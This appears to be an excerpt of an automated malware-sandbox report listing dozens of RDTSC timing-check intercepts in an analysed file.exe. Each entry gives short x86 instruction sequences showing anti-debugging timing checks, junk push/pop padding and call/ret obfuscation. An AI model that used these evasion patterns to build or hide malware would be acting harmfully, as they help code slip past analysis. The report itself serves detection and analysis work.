Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECDAAD second address: ECDAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c jmp 00007F6E390E37F3h 0x00000011 pop ebx 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007F6E390E37E6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECDAD9 second address: ECDAE3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECDAE3 second address: ECDAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECDAE9 second address: ECDB67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E061h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jc 00007F6E3947E068h 0x00000015 pushad 0x00000016 jmp 00007F6E3947E05Ah 0x0000001b ja 00007F6E3947E056h 0x00000021 popad 0x00000022 pop eax 0x00000023 sub edx, 0EFC9FA1h 0x00000029 push 00000003h 0x0000002b jmp 00007F6E3947E05Ch 0x00000030 push 00000000h 0x00000032 push 00000003h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F6E3947E058h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e mov edi, dword ptr [ebp+122D2940h] 0x00000054 push 6CB48285h 0x00000059 push eax 0x0000005a push edx 0x0000005b jno 00007F6E3947E058h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECDB67 second address: ECDBB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 534B7D7Bh 0x00000010 push ecx 0x00000011 mov dword ptr [ebp+122D3731h], eax 0x00000017 pop edi 0x00000018 lea ebx, dword ptr [ebp+124518BDh] 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F6E390E37E8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 push eax 0x00000039 pushad 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d pushad 0x0000003e popad 0x0000003f popad 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECDCB1 second address: ECDCBB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECDDC6 second address: ECDE19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D379Ch], ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F6E390E37E8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f xor dword ptr [ebp+122D1B94h], ecx 0x00000035 call 00007F6E390E37E9h 0x0000003a pushad 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECDE19 second address: ECDE47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6E3947E056h 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F6E3947E069h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE0BB6 second address: EE0BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE0BBA second address: EE0BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE0BC4 second address: EE0BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EB23B2 second address: EB23C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6E3947E056h 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EECB61 second address: EECB67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EED0C8 second address: EED0F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E065h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F6E3947E062h 0x00000012 jc 00007F6E3947E056h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EED0F2 second address: EED0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EED0F6 second address: EED102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F6E3947E056h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EED267 second address: EED26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EED26D second address: EED288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E05Ah 0x00000009 popad 0x0000000a jne 00007F6E3947E05Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EED288 second address: EED28E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EED463 second address: EED4B0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F6E3947E056h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b je 00007F6E3947E056h 0x00000011 jmp 00007F6E3947E068h 0x00000016 jmp 00007F6E3947E066h 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 jg 00007F6E3947E056h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EED4B0 second address: EED4B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EED634 second address: EED63E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E3947E056h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EED7B5 second address: EED7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EED7B9 second address: EED7C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EEDAA6 second address: EEDAAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EEDBE6 second address: EEDC0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F6E3947E056h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jl 00007F6E3947E056h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 jg 00007F6E3947E056h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE5BE9 second address: EE5C08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE5C08 second address: EE5C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EEDF06 second address: EEDF0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EEDF0A second address: EEDF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F6E3947E05Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EEE6BB second address: EEE6C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F6E390E37E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EEE6C5 second address: EEE6C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EF0FD7 second address: EF0FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jo 00007F6E390E37E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EBE085 second address: EBE0A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6E3947E065h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EBE0A3 second address: EBE0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EF5C2F second address: EF5C50 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F6E3947E05Ch 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F6E3947E056h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFA7BE second address: EFA7CF instructions: 0x00000000 rdtsc 0x00000002 js 00007F6E390E37E6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFAC1B second address: EFAC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFAC21 second address: EFAC25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFAC25 second address: EFAC2D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFAC2D second address: EFAC33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFAC33 second address: EFAC37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFAC37 second address: EFAC68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6E390E37F1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F6E390E37F1h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFAC68 second address: EFAC6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFADC8 second address: EFADCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFADCC second address: EFADD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFADD0 second address: EFADF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6E390E37E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F6E390E37F8h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFADF8 second address: EFAE0B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6E3947E05Eh 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD048 second address: EFD04E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD04E second address: EFD052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD052 second address: EFD063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD063 second address: EFD067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD067 second address: EFD0A0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E390E37E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007F6E390E37F8h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6E390E37EEh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD0A0 second address: EFD107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E05Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F6E3947E058h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 call 00007F6E3947E067h 0x00000029 or si, 76F2h 0x0000002e pop edi 0x0000002f sub dword ptr [ebp+122D1A1Eh], ecx 0x00000035 push 2CE7C4B6h 0x0000003a jng 00007F6E3947E068h 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD107 second address: EFD10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD25A second address: EFD25F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD25F second address: EFD265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD4EE second address: EFD4F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD4F4 second address: EFD4FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD4FA second address: EFD4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD4FE second address: EFD510 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6E390E37E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD5BE second address: EFD5C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD5C2 second address: EFD5C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD5C8 second address: EFD5CD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFD887 second address: EFD89C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E390E37F1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFDD0B second address: EFDD11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFE075 second address: EFE07A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFE1C7 second address: EFE1CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFE733 second address: EFE7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jnc 00007F6E390E37ECh 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F6E390E37E8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d jmp 00007F6E390E37F0h 0x00000032 push 00000000h 0x00000034 jmp 00007F6E390E37EFh 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d jmp 00007F6E390E37F8h 0x00000042 jng 00007F6E390E37E6h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFE7AF second address: EFE7CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6E3947E062h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFE7CE second address: EFE7D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFE7D2 second address: EFE7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F00152 second address: F00156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F00156 second address: F0015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F02201 second address: F02205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F02205 second address: F02209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F02209 second address: F0220F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0220F second address: F02233 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E067h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F02233 second address: F02283 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6E390E37ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b adc edi, 5A117243h 0x00000011 movsx edi, bx 0x00000014 push 00000000h 0x00000016 pushad 0x00000017 movsx ebx, di 0x0000001a popad 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F6E390E37E8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 push esi 0x00000038 mov esi, dword ptr [ebp+122D1FD1h] 0x0000003e pop edi 0x0000003f push eax 0x00000040 pushad 0x00000041 push esi 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F02283 second address: F0228B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0228B second address: F02291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F02C5A second address: F02C87 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, 4CA3ED81h 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D2E6Dh], edi 0x00000017 push 00000000h 0x00000019 mov edi, 4199B5FDh 0x0000001e xchg eax, ebx 0x0000001f push esi 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 pop esi 0x00000027 push eax 0x00000028 push ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F03768 second address: F037AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6E390E37E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F6E390E37E8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 xor dword ptr [ebp+122D19C8h], eax 0x0000002e cmc 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 push ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F6E390E37EBh 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F034B1 second address: F034B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
